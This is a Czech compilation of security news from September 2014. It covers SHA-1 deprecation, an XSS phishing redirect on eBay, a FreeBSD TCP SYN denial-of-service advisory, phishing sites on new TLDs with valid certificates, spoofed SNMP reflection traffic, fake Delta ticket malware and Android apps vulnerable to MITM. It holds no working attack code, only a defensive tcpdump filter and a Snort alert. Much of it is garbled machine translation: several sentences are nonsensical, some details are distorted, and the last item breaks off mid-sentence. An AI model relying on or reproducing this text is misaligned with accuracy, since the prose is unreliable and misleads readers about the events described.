Je smutné, že "ověřením" pro naše Honeypot vlastně nebylo vše, co rozsáhlá. Byl bych rád, aby si o nevábné skrytého života našeho malého Honeypot, zejména jeho peněženku řidiče na pokutách (vysoce nepravděpodobné, je starý i486) a jeho odsouzení za držení (více pravděpodobné, vzhledem k tomu, že v minulých případech, kouř byl vidět příchod ze skříně), nebo její sexuálních trestných činů (opět nepravděpodobné, vzhledem k tomu, že do jeho přístavů, jsou sériové a jeho sloty jsou ISA :).

Nesnažili jsme Instant mat "službu", takže mohu-li jeho k ničemu to říct. Ale vzhledem k tomu, že její nabídka zřejmě třeba nevyžádanou poštou a nevyžádanou poštou URL se denně mění, a přesměrovat přes čtyři chmele skončit na tcgtrkr-dot-com, a konečně na instantcheckmate, řekl bych, že je pravděpodobné, že není až na moc dobré.

Pokud vlastníte tuto "službu", jste vítáni, aby se vyjádřil, po tom všem, vaše pozadí kontrola je nyní veřejná :). Pokud nechcete, aby se vyjádřil, možná budete chtít, aby zvážila odstranění e-mailové adresy, které mají slovo "sans" v nich z vašeho seznamu nevyžádané pošty, možná?


Zkontrolujte nastavení ochrany osobních údajů na Facebooku s Ochrana osobních údajů Checkup
19.9.2014 Sociální sítě
Facebook Zásady ochrany osobních prohlídka nástroj - neformálně přezdívaný "Ochrana Dinosaur" - byl učiněn k dispozici . použití pro všechny uživatele populární sociální sítě, které byly původně zavedeny a testovány v dubnu o malém počtu uživatelů, nástroj zřejmě obstálo, a zbytek z uživatelů budou brzy vyzváni k vyzkoušet pomocí pop-up. Or, mohlo by se jim to vyzkoušet hned, po kliknutí na ikonu zámku v pravém horním rohu své stránce na Facebooku a výběru (neopakovatelného) možnost.

Ve třech krocích, bude nástroj zvou a změnit výchozí nastavení určuje, kdo uvidí vaše příspěvky, nastavení pro aplikace, které jste přihlášeni na s Facebookem, a osobní údaje, které jste součástí ve svém profilu. nástroj je velmi snadno ovladatelný a není přemoci uživatelům informace, a doufejme, že jim impuls k přezkoumání veškeré své nastavení soukromí a dozvědět se více o nich.
 

Dalo by se divit, proč po letech tlačení uživatelům sdílet více informací veřejnosti, Facebook nyní začala starat o soukromí uživatelů? Je pravděpodobné, že Facebook se snaží rehabilitovat jeho obraz s větší veřejnost, a uživatelé, kteří se obávají o své soukromí i nadále sdílet užitečné údaje. Začátkem tohoto roku, na F8 Developers Conference, společnost oznámila, že uživatelé, kteří se obávají údajů shromážděných prostřednictvím aplikace bude brzy nabídnuta možnost volby pro přihlášení do aplikací třetích stran anonymně. Facebook je zřejmě po počtu uživatelů a dat, ale pro sebe. Společnost údajně pracuje na mobilní reklamní sítě podobné Google je, jak to je, kteří chtějí získat větší podíl z příjmů reklamy.


McAfee a Symantec spojit Cyber ​​Threat Alliance
19.9.2014 IT
Fortinet a Palo Alto Networks, jak originální spoluzakladatelé první kybernetické hrozby aliance odvětví, oznámila, že McAfee a Symantec, se připojil k alianci jako spoluzakladatelů. Posláním Cyber ​​Threat Aliance je řídit koordinované průmyslu úsilí proti počítačové protivníci díky hluboké spolupráce na hrozbách a sdílení ukazatele kompromisů. Zatímco v minulosti průmysl snahy byly často omezeny na výměnu vzorků malwaru, tato nová aliance bude poskytovat žalovatelné hrozbách z přispívajících členů, včetně informací o zero-day zranitelnosti, botnet velení a řízení (C & C) informační server, mobilní hrozby, a ukazatele kompromis (IoCs) v souvislosti s pokročilými perzistentními hrozbami (apts), stejně jako běžně sdílené vzorků malwaru. zvýšením kolektivní žalovatelné inteligenci průmyslu, budou účastníci aliance bude schopna zajistit větší bezpečnost pro individuální zákazníky a organizacemi. Kromě vyvíjející rámec a stanovy aliance spoluzakladatelů Fortinet, McAfee, Palo Alto Networks a Symantec každý věnovat zdroje, aby bylo možné stanovit nejúčinnější mechanismus pro sdílení pokročilých datových hrozeb na podporu spolupráce mezi všemi členy aliance a aby jednotný postup v boji proti sofistikované počítačové protivníky. "Musíme se musí shodovat s agresivní disk naši protivníci inovovat s naší vlastní hlubší závazek spolupracovat. Je to dost, už sdílet a porovnávat včerejší vzorků malwaru. Jako průmysl, musíme rozumět a být připraven reagovat na nejnovější komplexní a multidimenzionální útoky dneška a zítřka. Tento cyber aliance poskytuje kritický rámec pro vzdělávání sebe na infrastrukturu a vyvíjí taktiku za těmito útoky, "řekl Vincent Weafer, senior viceprezident společnosti McAfee Labs, součást Intel bezpečnosti.


Google začne postupně Sunsetting SHA-1
19.9.2014 Kryptografie
Google oznámil, že zahájí proces postupného Sunsetting SHA-1 (jak je používán v podpisech certifikát pro HTTPS) Chrome 39, která by měla být vydána v listopadu. " SHA-1 hash kryptografický algoritmus je známo, že je podstatně slabší, než byl navržen tak, aby se přinejmenším od 2005 -. před 9 lety kolize proti SHA-1 jsou příliš dostupné pro nás považovat za bezpečné pro veřejné webové PKI můžeme očekávat jen to, že útoky budou levnější, "Google je. Chris Palmer, "Secure Socket Lover" a Ryan Sleevi, "Transport Layer bezpečnější" vysvětlil zdůvodnění rozhodnutí v pátek. S tímto závazkem, Google je ve stopách společnosti Microsoft a Mozilla. Téměř před rokem, bývalý oznámila, že systém Windows přestane přijímat SHA-1 certifikáty SSL v roce 2017, a tento měsíc Mozilla uvedeno totéž a odstranit některé 1024-bit kořenové certifikáty ze svého seznamu důvěryhodnosti. Společnosti vzali do úvahy, že předpovědi provedené Národní institut pro standardy a technologie (NIST), které říkají, že digitální podpis algoritmy využívající 1024-bitové klíče bude buď zlomené nebo může být ve vážném nebezpečí, že budou rozděleny do roku 2017 nebo 2018. To je také důvod, proč v loňském roce Google aktualizován její SSL certifikáty 2048-bitovými klíči. "Musíme zajistit, aby v době, kdy útok na SHA-1 je prokázáno veřejně web již vzdálil z ní. Bohužel, toto může být docela náročné," Palmer a Sleevi poukázal. "Například, když Chrome zakázáno MD5, počet podniků, škol a malé a střední podniky byly ovlivněny, když jejich serveru proxy software - od předních dodavatelů -. Pokračoval používat nezabezpečené algoritmy, a byla ponechána míchat aktualizací Uživatelé, kteří používají osobní firewall byly také postiženy. " Aby se pokusit, aby se zabránilo takové události z děje znovu, Google oznámil, že nadcházející Chrome iterace začne postupně léčbu SSL certifikáty, které obsahují podpis SHA-1-založený jako součást řetězu certifikátů a končí dnem nebo po 01.1.2017 jako "bezpečné, ale s menšími chybami", "neutrální, bez zabezpečení," a nakonec, s Chrome 41 se v 1. čtvrtletí 2015, jako "kladně nejistá."


Nárůst kybernetických útoků zaměřených na finanční služby firmám
19.9.2014 Kriminalita
Kybernetickými útoky zaměřené na finanční služby, firmy jsou na vzestupu, ale tyto organizace dělají dost pro ochranu obchodních a zákaznických dat?

Podle průzkumu společnosti Kaspersky Lab a B2B International celosvětových IT profesionálů, 93% finančních služeb organizací zažila různé hrozbách v posledních 12 měsících. A zatímco kybernetickými útoky zaměřené na finanční služby, firmy jsou na vzestupu, téměř jeden ze tří dosud neposkytují ochranu koncových uživatelů nebo implementovat speciální ochranu uvnitř vlastní infrastruktury. Podle průzkumu, tento nedostatek akce, aby se ochránili od útok způsobuje mnohé podniky ztratí víru ve finančních společnostech, jejichž úkolem je udržovat jejich data v bezpečí. Ve skutečnosti pouze 53% podniků pocit, že finanční organizace udělal dost, aby chránit své informace. Průzkum také zjistil, že 82% podniků by zvážit opuštění finanční instituci, která utrpěla porušení dat, a že 74% podniků si vybrat finanční organizace podle jejich bezpečnostní pověsti. Tento cit byl ozvěnou v samostatné společnosti Kaspersky Lab spotřebitele bezpečnostní rizika průzkum, který zjistil, že 60% ​​spotřebitelů dává přednost společnosti, které nabízejí další bezpečnostní opatření na ochranu finančních dat. Jasná propast mezi tím, co firma očekává od finanční instituce ve srovnání s běžnými vjemy vůči poškození způsobené porušením dat se zvětší dál, když vezmete v úvahu, že pouze 28% finančních organizací myslíte, že riziko škod z počítačové kriminality převažuje náklady na prevenci. Tento způsob myšlení je velmi špatný vzhledem k tomu, že 52% finančních institucí se politika proplácení veškeré ztráty způsobené počítačové trestné činnosti, aniž by šetření, a že skutečné náklady na ztráty finančních údajů mezi 66,000 dolarů -. 938,000dolar v závislosti na velikosti organizace však Průzkum Kaspersky Lab odhalila jiskřičku naděje pro finanční služby organizace "konečný obrátit se k provádění odpovídající zabezpečení. 47% finančních společností si myslí, že ztráta důvěryhodnosti / poškození pověsti v důsledku porušení dat je nejhorší následky pro společnost. Kompletní přehled je dostupný zde.


Typická domácí obsahovat 500 chytrých zařízení do roku 2022
19.9.2014 IT
Klesající náklady na přidání snímání a komunikací, aby spotřební výrobky bude znamenat, že typický rodinný dům, ve zralém bohaté trhu, může obsahovat několik set inteligentní objekty do roku 2022, podle agentury Gartner, Inc Gartner uvedl, že inteligentní domácnost bude plocha dramatického vývoje v příštím desetiletí a nabídne řadu inovativních digitálních obchodních příležitostí na ty organizace, které se mohou přizpůsobit své výrobky a služby, které ji využít. "Očekáváme, že velmi širokou škálu domácích spotřebičů se stanou" inteligentní "v tom smyslu, získání určitá úroveň snímání a inteligence v kombinaci se schopností komunikovat, většinou bezdrátově, "řekl Nick Jones, viceprezident a odlišit analytik společnosti Gartner. "Sofistikovanější zařízení bude zahrnovat i snímání a funkcí dálkového ovládání. Cena bude zřídkakdy inhibitor, protože náklady na internetu věcí (internetu věcí), což umožňuje" věc "spotřebitel bude blížit $ 1 v dlouhodobém horizontu." počet inteligentních objektů V průměrné domácnosti poroste pomalu po dobu nejméně deseti let, protože mnoho velkých domácích spotřebičů jsou nahrazeny jen zřídka. Nicméně, i když dospělý inteligentní domácnost nebude existovat, dokud 2020-2025 časovém horizontu, inteligentní domácí produkty jsou již ve výrobě a první digitální obchodní příležitosti, které umožňují již objevily. Inteligentní kategorie domácí výrobek, jsou rozmanité a pohybují se od médií a zábavy , jako jsou konzole a TV, k zařízení, jako jsou sporáky a pračky, do informačních technologií v dopravě, bezpečnosti a kontroly v oblasti životního prostředí a zdravotnictví a fitness zařízení. Bezdrátová technologie budou klíčovým základem inteligentních domů a většina z kategorií zařízení bude být připojen bezdrátově, i když není jediný technologie bude dominovat. Gartner očekává, Wi-Fi, Bluetooth, ZigBee, buněčné a různé proprietární a pletivo sítí bezdrátových technologií budou všechny najít místo v inteligentním domě. Je tedy pravděpodobné, že bude třeba překlenout mezi mnoha různými standardy a protokoly řada bran a adaptérů. Mnoho domácích bezdrátových inteligentní objekty budou přenosné, a nebude mít snadný přístup k pevné napájení, takže výrobci baterií budou profitovat z inteligentního domu stejně tak vývojáři napájení a skladovacích technologií, jako je bezdrátové nabíjení. inteligentní domácnost umožní nové příležitosti na všech třech úrovních digitálního podnikání rámcové Gartner -. podnikových procesů (zlepšování stávajících procesů), obchodní modely (nové obchodní postupy, které narušují stávající trhy) a obchodní momenty (záchytné a využití přechodných obchodní příležitosti) Příklady klíčových obchodních příležitostí usnadněno inteligentní domácnost patří: nové produkty a funkce - od zlepšení použitelnost s přídavkem gesta nebo hlasové ovládání k aktualizaci nebo zlepšení vlastností určitého výrobku po celou dobu jeho životnosti, inteligentní výrobky mají potenciál výrazně zlepšit stávající produkty. Příjmy a úsporná příležitosti - Příklady sahají od automatické doplňování spotřebního materiálu v tuzemských i zahraničních výrobků (například kávové kapsle, vodních filtrů a vysavače sáčků na prach) k zachycení Nákup a výměna rozhodnutí. nových obchodních modelů - například o nové kombinace produktů a služeb, které ohrožují tradiční společnosti . Například, poskytovatel služeb mohl integrovat informace ze senzorů nízkonákladových v kombinaci s jinými inteligentními výrobky, jako jsou inteligentní zámky a domácí senzorů vytvořit nové cloud-based domácí sledování a bezpečnostní služby, které se podbízejí tradiční poplašná zařízení proti vloupání. sociálních a vládních iniciativ - v některých Vlády zemí budou vidět rostoucí inteligenci domácí techniky jako způsob, jak ovlivnit chování spotřebitelů nebo zlepšení nabídky služeb pro občany. Například, senzory a inteligentní produkty by mohla umožnit odlišnému zdanění; daň z vody použité k mytí může být nižší než daně z vody používané k zavlažování zahrady. Dalším příkladem by mohlo být inteligentní odpadkové koše, které vykazují, když jsou plné a potřebují sbírat. Analýza a zpeněžit informace - Prakticky všechny chytré domácí objekty bude obsahovat nějaký druh senzoru, a některé budou obsahovat mnoho senzorů. Sběr, analýzu a zpeněžit informace shromážděné inteligentních produktů bude pro mnohé internet věcí založených na digitálních obchodních modelů. Navzdory mnoha obchodních příležitostí, které nabízí inteligentní domácnost, inteligentní domácnost vize čelí mnoha výzvám, v neposlední řadě, které mohou spotřebitelé musí být přesvědčeni o jeho hodnotě. Některé prvky domácího technologie inteligentního, jako jsou dálkově ovládané spínače a stmívače jsou k dispozici již mnoho let, ale mají velmi malou trakci mimo uživatelů techno -Android Geek, protože jen málo spotřebitelé vnímají dostatečnou hodnotu. Konstruktéři výrobků musí usilovat o to, vytvořit hodnotu, která přesahuje rámec technologické novinky a jednoduché kontrolní funkce. Kromě toho bude chytré produkty vnitřně složitější, než jejich předchůdci, ale být úspěšný výrobek musí být jednoduché a použitelné pro netechnických jednotlivce. Spotřebitelé mohou mít obavy z použití údajů, bezpečnost a soukromí také. Digitální obchodní modely budou silně záviset na další informace, které shromažďujeme chytré produkty ve srovnání s jejich "němé" protějšky. Ale nevhodné použití těchto informací by mohlo generovat spotřebitelů vůli. Obchodní modely, které analyzují informace, a to zejména ty, které kombinují informace z různých zdrojů, je třeba věnovat velkou pozornost otázkám, jako jsou spotřebitelské opt-in, vzdělávání a zabezpečení dat, a vývojáři produktů by měla zvážit externí audity jejich využití informací. nedostatek interoperability a normy se mohou také bránit přijetí inteligentních zařízení. V současné době je inteligentní domácnost doména je matoucí technické míchanice, který zahrnuje mnoho různých síťových technologií a protokolů, z nichž většina jsou vlastnictvím a nejsou interoperují. Některé iniciativy interoperability jsou v plném proudu; Nicméně je pravděpodobné, že i když ostrovy interoperability se objeví o konkrétních dodavatelů a výrobků, bude doména zůstane technicky roztříštěné do roku 2020. "Přístroje v inteligentním domě bude vyžadovat připojení, některé budou vyžadovat vysokou spolehlivost jak oni budou vykonávat životně důležitých funkcí: jako sledování zdravotního stavu, takže domy budou mít k dispozici spolehlivé vysokorychlostní připojení k internetu, "řekl pan Jones. "Je-li tato spojení nezdaří, mnoho domácích zařízení mohou být nuceni pracovat v, v nejlepším případě, degradované způsobem. Pokud domovy stát jako závislé na dobrém připojení jako podniky, které budou potřebovat záložních systémů."


První firewall chránící před hrozbami nultého dne

19.9.2014 Zabezpečení
Hned několik technologií v sobě spojuje nejnovější firewall ASA 5500 firmy Cisco – může tak prý jako první firewall na trhu nabídnout ochranu před nedokumentovanými hrozbami.

Novinka nabízí kombinaci technologií ASA (Adaptive Security Appliance), FirePower, IPS a AMP (Advanced Malware Protection) založených na platformě SourceFire.

Díky tomu využívá kontextovou a dynamickou analýzu bezpečnostních hrozeb, což podle výrobce dovoluje ochránit sítě v době před začátkem kybernetického útoku, v jeho průběhu i po jeho skončení.

Vůbec poprvé si prý díky technologiím FirePower firewall umí poradit s hrozbami nultého dne, tedy s novými a dosud nepopsanými útoky, na které nelze předem připravit bezpečnostní politiky.

Kromě koupě produktů ASA 5500-X a 5585-X si lze nové funkce dokoupit i k existujícím firewallům ASA, a to prostřednictvím licence ke službám FirePower Services for Cisco ASA.

Vlastnosti nových firewallů podle výrobce:

Přehlednost prostředí – správci sítí i bezpečnostní odborníci získávají přehledné rozhraní, v němž mohou jednoduše získat informace o připojených zařízeních (včetně mobilních), potenciálně nebezpečných aplikacích, hrozbách i indikátorech kompromitace (IoC)
Zaměření na hrozby – kombinace technologií pro ochranu před známými i pokročilými hrozbami se propojila s AMP schopnou bojovat s hrozbami nultého dne, kontinuální analýzou a s Cisco Collective Security Intelligence (CSI).
Integrovaná platforma – Kromě tradiční ochrany nabízí i IPS a pokročilou detekci hrozeb v jediném zařízení. Tato integrace přináší zjednodušení firemní bezpečnostní infrastruktury při současném zvýšení bezpečnosti a snížení nákladů na vlastnictví.


Uživatelé eBay byli přesměrováni na podvodný web

18.9.2014 Incidenty
Experti upozornili na nové bezpečnostní riziko na největším aukčním portále světa eBay – někteří uživatelé byli po kliknutí na legitimní odkaz z eBay přesměrováni na web, který krade přihlašovací údaje.

Podvodná webová stránka vypadá zcela identicky jako eBay. Aukční portál byl o bezpečnostním riziku informován ve středu, aukce s nebezpečnými odkazy však odstranil až po telefonátu BBC další den. Bezpečnostní experti proto byli překvapeni, jak dlouho eBay trvala odezva. „eBay je velká společnost, která by měla mít tým připravený nepřetržitě,“ uvedl Steven Murdoch z Výzkumné skupiny zabezpečení informací University College v Londýně, jenž byl schopen podvodné aukce ještě před jejich odstraněním analyzovat.

U podvodných aukcí byla použita technika známá jako cross-site scripting (XSS), v rámci níž útočník vloží do vytvořené aukce s určitým produktem nebezpečný javascriptový kód. Ten následně automaticky přesměruje postížené uživatele skrze sérii jiných webových stránek na web téměř nerozeznatelný od legitimnéch stránek eBay. Zde je po uživateli žádáno zadání přihlašovacího jména a hesla. „Webové stránky, na něž je uživatel přesměrován, jsou téměř jistě útočníky používány k zakrytí stop,“ uvedl Murdoch a dodal, že falešná webová stránka, na niž byli uživatelé nakonec přesměrováni, obsahovala kód, díky němuž by bylo možné podniknout i další útoky.

„I když obvykle je eBay na útočníky dobře připraven, zde ho nachytali,“ dodal Murdoch. „Cross-site scripting je zcela jistě mezi top 10 bezpečnostními riziky, na něž si vlastníci webových stránek musejí dávat pozor.“ Mluvčí eBay se snažil nebezpečnost útoku zlehčit. „Nebezpečná byla pouze jedna jediná aukce na eBay.co.uk, do níž útočník integroval odkaz, který uživatele přesměrovával pryč z eBay,“ řekl mluvčí. „Bezpečnost na našem aukčním portálu bereme velmi vážně a aukci jsme ihned odstranili.“ BBC se však podařilo najít další dvě podvodné aukce, které vytvořil ten samý uživatel.

Na bezpečnostní riziko na eBay jako první upozornil Paul Kerr, který pracuje v IT a na eBay prodává jako „PowerSeller“. Aukční server Kerr kontaktoval krátce poté, co klikl na odkaz v jedné z aukcí a byl přesměrován. Kerrovi se na podvodné stránce ihned něco nezdálo. Jak však dodal, řada neopatrných uživatelů mohla útočníkům jednoduše naletět. „Někdo na podvodném webu své údaje určitě zadal. Nemůžete vědět, kolik ze stovek tisíc uživatelů eBay na odkaz kliklo,“ řekl Kerr, který celý proces přesměrování z eBay na podvodný web nahrál na video a umístil na YouTube.


Tim Cook: data zákazníků nezkoumáme

17.9.2014 Sledování
Šéf společnosti Apple se v novém rozhovoru obul do konkurenčních technologických společností ve věci týkající se ochrany soukromí uživatelů.

Ve druhé části interview s Charliem Rosem, jež byla odvysílána v pondělí, Cook řekl, že Apple neprodává data svých uživatelů a zpochybnil praktiky společností, které to dělají. Cook uvedl, že Apple vydělává především prodejem hardwaru, narozdíl od jiných technologických firem ze Sillicon Valley, jež profitují z reklamy cílené na jejich uživatele. „Náš byznys není založen na tom, že o vás sbíráme informace. Nejste náš produkt,“ řekl Cook. „Myslím si, že se každý musí zeptat na jednu věc: jak firmy vydělávají své peníze? Následujte tok peněz. A pokud vydělávají peníze především tím, že shromažďují velké objemy osobních dat, myslím si, že máte právo na to být znepokojeni.“

Cook tato vyjádření pronesl v odpovědi na otázku Roseho týkající se obav uživatelů o množství osobních dat, jež společnosti typu Googlu shromažďují. Reklamní byznys Apple je mnohem menší, než ten Googlu, Facebooku nebo Twitteru. Skrze platformu iAd, již Apple spustilo před čtyřmi lety, se Apple zaměřuje na reklamu v aplikacíh běžících na jeho mobilních zařízení. K tomu americká společnost využívá například historii nákupů uživatelů v iTunes a domácí adresy. Ve své odpovědi Roseovi se však Cook k iAd nevyjádřil.

Google a Apple byli jednu dobu blízcí spojenci, nyní jsou však rivalové. Operační systém Android přímo konkuruje iOS od Apple a obě společnosti často stojí o akvizice stejných firem.

Cook upřesnil, že Apple nezajímají iMessage nebo e-maily jeho uživatelů. U nových projektů typu Apple Pay a HealthKit – kde uživatelé ukládají osobní informace jako kreditní karty či informace o zdravotním stavu na zařízení Apple – americká společnost tvrdí, že jejich data jsou šifrována tak, že k nim nemá přístup nikdo z Applu. „Díváme se na to velmi odlišně, než řada jiných společností. Náš pohled je takový, že když navrhujeme novou službu, snažíme se nesbírat žádná data,“ řekl Cook. „Tomuto byznysu se nevěnujeme. Myslím si totiž, že lidé mají právo na soukromí.“

Šéf Apple se také důrazně vyjádřil ke zprávám z července tohoto roku, podle kterých operační systém iOS obsahuje zadní vrátka pro třetí strany (v tomto smyslu byla zmiňovaná především americká agentura NSA), které tak mohou přistupovat k osobním datům uživatelů. Apple již v červenci uvedlo, že se tyto zprávy nezakládají na pravdě a Cook to nyní opět potvrdil. „Nic z toho není pravda, nula,“ uvedl. „Nikdy bychom nedopustili, aby se to stalo.“

V celém interview Cook mimo jiné také uvedl, že „Apple mohlo iPhony s většími displeji vyrábět již před lety“, avšak společnost čekala, dokud nebude moci provést řádná vylepšení. „Nikdy to nebylo o tom, udělat jen větší telefon,“ řekl Cook. „Bylo to o tom, udělat v každém směru lepší telefon. A my proto vydáváme věci až tehdy, když jsou opravdu hotové.“


Kaspersky odhalí hacknutí webové kamery či zranitelné Wi-Fi

17.9.2014 Incidenty
Novou verzi antimalwaru pro spotřebitele a SOHO představil Kaspersky Lab. Internet Security – Multi-Device 2015 chrání před riziky zařízení s Windows, OS X i Androidem.

Novinka obsahuje řadu nových technologií, které zlepšují úroveň ochrany před šifrovacím malwarem, zabraňují sledování uživatele webkamerou a ochraňují před riziky připojení k zranitelným Wi-Fi sítím.

Například funkce Webcam Protection proto monitoruje aplikace snažící se o připojení k webkameře, varuje před pokusy o přístup a v případě potřeby jej zablokuje (u Windows).

Modul System Watcher zase analyzuje všechny procesy spuštěné v operačním systému a obsahuje také funkci zálohování dat. Pokud odhalí podezřelý program pokoušející se změnit uživatelská data, okamžitě vytvoří zálohu souboru, kterou není možné změnit. Pokud další sledování naznačí, že daný program byl škodlivý, veškeré změny budou vráceny zpět (funguje u OS Windows).

A modul Wi-Fi Security Notification ověřuje přístupové body Wi-Fi a upozorňuje uživatele na možné hrozby – jako například zranitelné síťové připojení nebo přenos nezabezpečeného hesla na internetu.

Další funkce Internet Security – Multi-Device 2015 podle výrobce:

Vylepšení ochrany peněžních transakcí Safe Money. Ta nově blokuje přístup aplikací třetích stran do schránky webového prohlížeče, která může dočasně obsahovat citlivá data (například kopie přihlašovacích údajů). Safe Money nadále chrání před odezíráním obrazovky, škodlivými rozšířeními prohlížeče a dalšími potenciálně rizikovými doplňky (u Windows).
Pro uživatele placených Wi-Fi sítí a 3G či LTE připojení řešení obsahuje funkci Cost-Aware Networking, která snižuje množství dat odeslaných přístrojem přes internet (platí pro Windows 8 a výše).
Vylepšení technologie anti-phishingového modulu chránícího před nechtěnými škodlivými stránkami v oblasti analýzy textu, obrázků a odkazů.
Hlavní menu a rozhraní jsou nyní jednotné ve všech produktech. Uživatelé tak mohou ovládat zabezpečení snadněji – ať už jsou jejich platformy, verze produktů či zařízení jakékoliv. Kaspersky Lab také zlepšila efektivitu a snížila nároky na systémové zdroje bez vlivu na výkon operačního systému nebo úroveň zabezpečení.


FreeBSD Denial of Service poradenství (CVE-2004 až 0230)
17.9.2014 Zranitelnosti
Chyba byla objevena Johnathan Looney na Juniper Sirt ve FreeBSD (základ pro Junos a mnoho dalších výrobků) ve způsobu, jakým FreeBSD zpracovává určitým pakety TCP (https://www.freebsd.org/security/advisories/FreeBSD-SA -14: 19.tcp.asc) Pokud budete posílat TCP SYN pakety pro existující připojení (tedy správný zdroj IP, zdrojový port, cílová IP, cílový port kombinaci), operační systém zbourat připojení.

Útok je podobný "uklouznutí v okně TCP" útok popsal v roce 2004 Paul Watson (http://packetstormsecurity.com/files/author/3245/), ale pomocí SYN pakety místo RST. Jeden z Psovodi úspěšně reprodukovat útok ve své laboratoři.

Pro ty z vás, které nemají FreeBSD ve vašem prostředí, pravděpodobně ano. Existuje řada přípravků, které využívají FreeBSD jako jejich základní operační systém. Málo, že na jaře na mysli, jsou OSX, Bluecoats Checkpoint NetScaler a více (částečný seznam je zde http://en.wikipedia.org/wiki/List_of_products_based_on_FreeBSD).

Dávejte pozor na aktualizace z vašich dodavatelů, Juniper je tady -> http://kb.juniper.net/ InfoCenter ? / index page = content & id = JSA10638 & cat = SIRT_1 & actp = SEZNAM


https://yourfakebank.support - začíná TLD zmatek!
17.9.2014 Zabezpečení
Docela hodně od té doby nové domény nejvyšší úrovně (TLD) "biz" pokračoval on-line před pár lety, a jediní, kdo nakupují domény v tomto prostoru byli podvodníci, jsme trochu věděl, co se stane, když ICANN nejnovější hloupost a peníze-grab šel žít. Vypadá to, že množství "nových" domén nejvyšší úrovně, jako "Podporu", ".club", atd nyní online. A opět se zdá, že pouze podvodníci kupují.

V současné době vyšetřuje vlnu phishingových e-mailů, které se snaží nalákat uživatele na kopii Bank of America webové stránky. Hlavní rozdíl, samozřejmě, je to, že veškeré přihlašovací údaje zadané nekončí s Bank of America, ale s některými podvodníci, kteří pak sami pomáhají k úsporám.

Phishingové e-maily, samy o sobě nejsou ničím novým. Ale zdá se, že adresy URL, jako je na obrázku v e-mailu phishing výše mají vyšší míru úspěšnosti s uživateli. Mám podezření, že je to způsobeno tím, že v daném URL "vypadá jinak", ale ve skutečnosti odpovídá propojené URL, takže starý obyčejný "moudrost" plachtění kurzoru myši na odkaz hledat odkazů na zvláštních místech .. vyhrál 't pomoct.

Ale počkejte, je toho víc! Vzhledem k tomu, podvodníci v tomto případě vlastní doménu, a samozřejmě triviálně může projít takzvanou "ověření řídicího domény" zaměstnané některými CA je, že ve skutečnosti se podařilo získat skutečnou, platný SSL certifikát!
 

Cituji z webu certifikační autority je:

Comodo SSL Zdarma je plně funkční digitální certifikát, uznávané a důvěru 99,9% prohlížečů. Vaši návštěvníci uvidí zlaté visací zámek a nebude vidět upozornění zabezpečení. Co dostanete:

Devadesát den bez SSL certifikátu (jiné CA Nabízíme 30 dnů maximálně.)
Vydáno on-line během několika minut, bez papírování a zpoždění
Nejvyšší síla 2048 bit podpisy / 256 bitové šifrování
Podepsáno ze stejného kořene jako důvěryhodné našich placených certifikátů
Uznána všemi hlavními prohlížeči a zařízení
Nezmiňují, proč si myslí, že něco z toho je to dobrý nápad.

Přidání SSL na Phish znamená, že další "ukazatel podvod", který jsme kdysi učil našim uživatelům je také již není platný. Když uživatel klikne na odkaz v e-mailu phishing, bude prohlížeč ve skutečnosti ukazují na ikonu "visacího zámku" o "bezpečném místě". Viz obrázek níže.

Pokud jste viděli jiné nedávné bankovní phishes, které používají nové domény nejvyšší úrovně a / nebo platné SSL certifikáty, dejte nám prosím vědět prostřednictvím kontaktního formuláře, nebo pod komentáře!


Google DNS server IP Adresa podvodné SNMP reflexní útoky
16.9.2014 Počítačový útok
Dostáváme nějaké zprávy o tom, SNMP, prověřování, která tvrdí, že pochází z 8.8.8.8 (veřejné rekurzivní DNS server společnosti Google). Toto je pravděpodobně součástí pokusu spustit DDoS proti Google pomocí SNMP jako zesilovače / reflektoru.

Prosím, dejte nám vědět, pokud vidíte některý z paketu. Zdrojová adresa IP by měla být 8.8.8.8 a cílový port by měl být 161 UDP. Například v tcpdump:

tcpdump -s0 -w / tmp / googlensmp dst port 161 a src hostitel 8.8.8.8

Díky Jamese zasláním šňupat záznam vyvolaný tímto:

15.září 11:07:07 uzel šňupat [25421]: [1: 2.018.568: 1] ET CURRENT_EVENTS Možná příchozí SNMP Router DoS (TTL 1) [Klasifikace: Pokus Denial of Service] [Priorita: 2] {UDP} 8.8.8.8 : 47074 -> xx251.62: 161

Zatím to nevypadá jako službu DNS serveru Google je degradován.


Dokonce i Bad Malware práce
16.9.2014 Viry
Za pár týdny, jsem se dostáváte několik "Delta Ticket" e-mailů denně, s kapsami na spustitelné soubory jako přílohy. E-maily jsou dělány asi tak zlé, jak to dostane:

"Z" adresa používá doménu náhodného
E-mail nepoužívá typický "Delta" Formátování / značky.
Příloha je přímo spustitelný, jen zip.
Antivirus je v pořádku, na novém vzorku, obdrželi právě teď (8/55 v závislosti na VirusTotal) a excelentní (> 30/55), u starších vzorků. [1]
E-mail (Informace o letu) je velmi specifická a nezdá se být upraven tak, aby odesílateli
Delta neposílá lístky jako příloh, jako je tento.
Fake Delta Ticket e-mail

Tak oni mohli udělat mnohem lépe. Smutné na tom je, že zřejmě nemají potřebu dělat lépe.

"Z" název, který je to, co většina lidí při pohledu na, čte "Delta Air Lines". Některé hlavní / populární AV nástroje stále nemají detekovat vůbec dobře, a dobře, uživatel chce kliknout na věci myslím.

Počáteční kus malware se zdá být obecný downloader. V mém systému nainstalován, co vypadalo jako falešné Adobe aktualizace. Stále běží, aby zjistili, co se přesně děje, ale nečekal moc.

[1] https://www.virustotal.com/en/file/4cf652e71bbbe37eecd
a58169471df27db15ca1e5a8f14006128a4883b095409/analysis/1410799974/


Výzkumníci sestavit seznam aplikací pro Android, které umožňují MITM útoky
16.9.2014 Mobil
Asi 350 Android aplikace, které lze stáhnout z Google Play a Amazon obchody nedokáží správně ověřit certifikáty SSL pro připojení HTTPS, a tedy otevřené uživatelům man-in-the-middle útoky, pokud je použít na nejistých a otevřených sítí, výzkumný pracovník s CERT Coordination Center v Software Engineering Institute na Carnegie Mellon University varoval. Zranitelné aplikace byly objeveny pomocí automatizované testování pomocí CERT tapioka testovací zařízení a vědci vést seznam z nich aktualizovány - mezi nimi jsou oficiální app OKCupid je, (ironicky ) počet bezpečnostních aplikací, ale většina znepokojivější je, že celá řada e-commerce (jako je aplikace eBay pro německé uživatele) a e-bankovnictví aplikací. seznam ještě není kompletní. Nastavení vytvořená výzkumníky testuje pouze jednu žádost v době, a testování začal teprve před několika týdny. Rozhodli se jít na veřejnost s touto informací ještě předtím, než prodejci své obvyklé 45 dnů opravit vydáno proto, že "v případě, že útočník zájem o provedení MITM útoky, oni už to dělá. " "To jste pravděpodobně nastaven na nebezpečný přístupový bod a jsou již zachytit všechen provoz, který prochází přes něj. Dále na podporu 